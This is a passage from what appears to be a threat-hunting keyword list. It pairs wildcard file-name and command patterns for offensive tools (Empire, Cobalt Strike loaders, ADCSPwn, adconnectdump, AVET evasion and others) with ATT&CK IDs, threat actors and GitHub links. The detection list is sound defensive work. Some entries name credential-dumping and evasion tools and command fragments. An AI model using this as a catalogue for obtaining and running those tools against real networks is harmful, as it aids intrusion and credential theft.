remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Accenture/Spartacus*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,1,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*AccessTokenImpersonationAccount*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Accounts with extra permissions.txt*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,0,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*AceLdr.*.bin*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*AceLdr.zip*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,0,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*acheron-master.zip*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*ACLight.ps1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*ACLight.psd1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*ACLight.psm1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*ACLight2.ps1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*ACLight2.psd1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*ACLight2.psm1*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*ACLight-master*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*aclpwn -f * -ft computer -t * -tt domain -d * -dry*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*aclpwn.py*,offensive_tool_keyword,Aclpwn,Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn,T1098 - T1208 - T1550 - T1484 - T1486,TA0005 - TA0007,N/A,N/A,Exploitation tools,https://github.com/fox-it/aclpwn.py,1,0,N/A,N/A,7,647,104,2021-11-18T03:47:24Z,2018-12-04T18:45:04Z -*ACLScanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*acltoolkit *,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*acltoolkit.git*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*acltoolkit-ad*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*acltoolkit-main*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*acronis_trueimage_xpc_privesc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*AcroRd32.exe FUZZ*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,0,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*Action: Locating SCCM Management Servers*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*Action: Locating SCCM Servers in Registry*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*action=SchTaskCOMHijack *,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*activedirectory/pwns.go*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*activeScan++.py*,offensive_tool_keyword,ActiveScanPlusPlus,ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/albinowax/ActiveScanPlusPlus,1,1,N/A,7,6,568,192,2022-11-15T13:47:31Z,2014-06-23T10:04:13Z -*AD Privesc Automation*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*ad_dns_dump.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*AD_Enumeration_Hunt.ps1*,offensive_tool_keyword,AD_Enumeration_Hunt,This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment,T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083,TA0001 - TA0007 - TA0005 - TA0002 - TA0003,N/A,N/A,AD Enumeration,https://github.com/alperenugurlu/AD_Enumeration_Hunt,1,1,N/A,7,1,79,16,2023-08-05T06:10:26Z,2023-08-05T05:16:57Z -*AD_Enumeration_Hunt-alperen_ugurlu_hack*,offensive_tool_keyword,AD_Enumeration_Hunt,This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment,T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083,TA0001 - TA0007 - TA0005 - TA0002 - TA0003,N/A,N/A,AD Enumeration,https://github.com/alperenugurlu/AD_Enumeration_Hunt,1,1,N/A,7,1,79,16,2023-08-05T06:10:26Z,2023-08-05T05:16:57Z -*ADACLScan.ps1*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*ADACLScanner*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*ADACLScanner-master*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*adalanche analyze*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*adalanche collect*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*adalanche-*.exe*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*Adalanche.git*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*adalanche-collector*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*ADCollector.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*adconnectdump.py*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*adconnectdump-master*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*adcs_enum.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*adcs_enum_com.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*adcs_enum_com2.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*adcsattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*adcskiller.py*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z -*ADCSPwn.csproj*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*ADCSPwn.exe*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*ADCSPwn.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ADCSPwn.sln*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*ADCSPwn-master*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z -*add_evasion check_fast_forwarding*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion computation_fibonacci *,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*add_evasion computation_timed_fibonacci*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense 